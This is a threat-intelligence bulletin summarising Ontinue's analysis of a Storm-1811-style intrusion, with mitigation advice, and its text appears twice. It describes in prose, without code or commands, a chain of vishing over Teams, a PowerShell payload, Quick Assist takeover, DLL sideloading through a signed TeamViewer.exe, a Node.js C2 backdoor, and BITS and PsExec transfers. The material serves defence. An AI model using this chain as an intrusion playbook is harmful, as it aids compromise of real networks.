Signed. Sideloaded. Compromised!
Summary:
Ontinue’s Cyber Defence Centre (CDC) analyzed a sophisticated, multi-stage attack that effectively combined vishing, remote access tools, and living-off-the-land techniques to infiltrate the victim's system. The threat actor began by leveraging social engineering tactics, specifically vishing, to manipulate the victim into interacting with a malicious PowerShell payload delivered via a Microsoft Teams message. Once the victim executed the PowerShell payload, the attacker escalated their access by utilizing Quick Assist, a legitimate remote support tool, to remotely control the compromised system. This remote access provided the threat actor with a foothold within the environment, from which they deployed signed binaries, such as TeamViewer.exe, alongside a malicious DLL (TV.dll), setting the stage for the next phase of the attack, which involved executing a JavaScript-based C2 backdoor via Node.js to maintain remote access and retrieve malicious commands.
Security Officer Comments:
CDC notes that the attack mirrors tactics commonly associated with the Storm-1811 threat group. Similar to Storm-1811, the actors employed social engineering tactics like vishing with trusted tools such as Teams and Quick Assist, to evade detection and establish persistent access within the compromised network. Additionally, they used native Windows tools, including BITS jobs and PsExec, to conduct covert data transfers. The attackers also engaged in lateral movement by exploiting compromised credentials to move undetected across the network, further expanding their access. This enabled them to steal sensitive credentials and conduct further reconnaissance. By establishing a persistent C2 connection through the JavaScript backdoor, the attackers were able to send arbitrary commands to the compromised systems at will, allowing them to maintain control and escalate the attack.
Suggested Corrections:
Organizations should conduct regular table top exercises to help employees recognize social engineering tactics such as vishing and ensure secure usage of remote access tools. Enforcing strict access controls, including multi-factor authentication, can prevent unauthorized lateral movement and credential theft. Additionally, disabling or closely monitoring the use of native tools like Quick Assist, PsExec and BITS jobs, can reduce the the overall attack surface. Furthermore, regular patching and the use of endpoint detection and response tools can help identify suspicious activity early, while implementing network segmentation can limit the impact of potential attacks.
Link(s):
https://www.ontinue.com/resource/blog-signed-sideloaded-compromised/
Ontinue’s Cyber Defence Centre (CDC) analyzed a sophisticated, multi-stage attack that effectively combined vishing, remote access tools, and living-off-the-land techniques to infiltrate the victim's system. The threat actor began by leveraging social engineering tactics, specifically vishing, to manipulate the victim into interacting with a malicious PowerShell payload delivered via a Microsoft Teams message. Once the victim executed the PowerShell payload, the attacker escalated their access by utilizing Quick Assist, a legitimate remote support tool, to remotely control the compromised system. This remote access provided the threat actor with a foothold within the environment, from which they deployed signed binaries, such as TeamViewer.exe, alongside a malicious DLL (TV.dll), setting the stage for the next phase of the attack, which involved executing a JavaScript-based C2 backdoor via Node.js to maintain remote access and retrieve malicious commands.
Security Officer Comments:
CDC notes that the attack mirrors tactics commonly associated with the Storm-1811 threat group. Similar to Storm-1811, the actors employed social engineering tactics like vishing with trusted tools such as Teams and Quick Assist, to evade detection and establish persistent access within the compromised network. Additionally, they used native Windows tools, including BITS jobs and PsExec, to conduct covert data transfers. The attackers also engaged in lateral movement by exploiting compromised credentials to move undetected across the network, further expanding their access. This enabled them to steal sensitive credentials and conduct further reconnaissance. By establishing a persistent C2 connection through the JavaScript backdoor, the attackers were able to send arbitrary commands to the compromised systems at will, allowing them to maintain control and escalate the attack.
Suggested Corrections:
Organizations should conduct regular table top exercises to help employees recognize social engineering tactics such as vishing and ensure secure usage of remote access tools. Enforcing strict access controls, including multi-factor authentication, can prevent unauthorized lateral movement and credential theft. Additionally, disabling or closely monitoring the use of native tools like Quick Assist, PsExec and BITS jobs, can reduce the the overall attack surface. Furthermore, regular patching and the use of endpoint detection and response tools can help identify suspicious activity early, while implementing network segmentation can limit the impact of potential attacks.
Link(s):
https://www.ontinue.com/resource/blog-signed-sideloaded-compromised/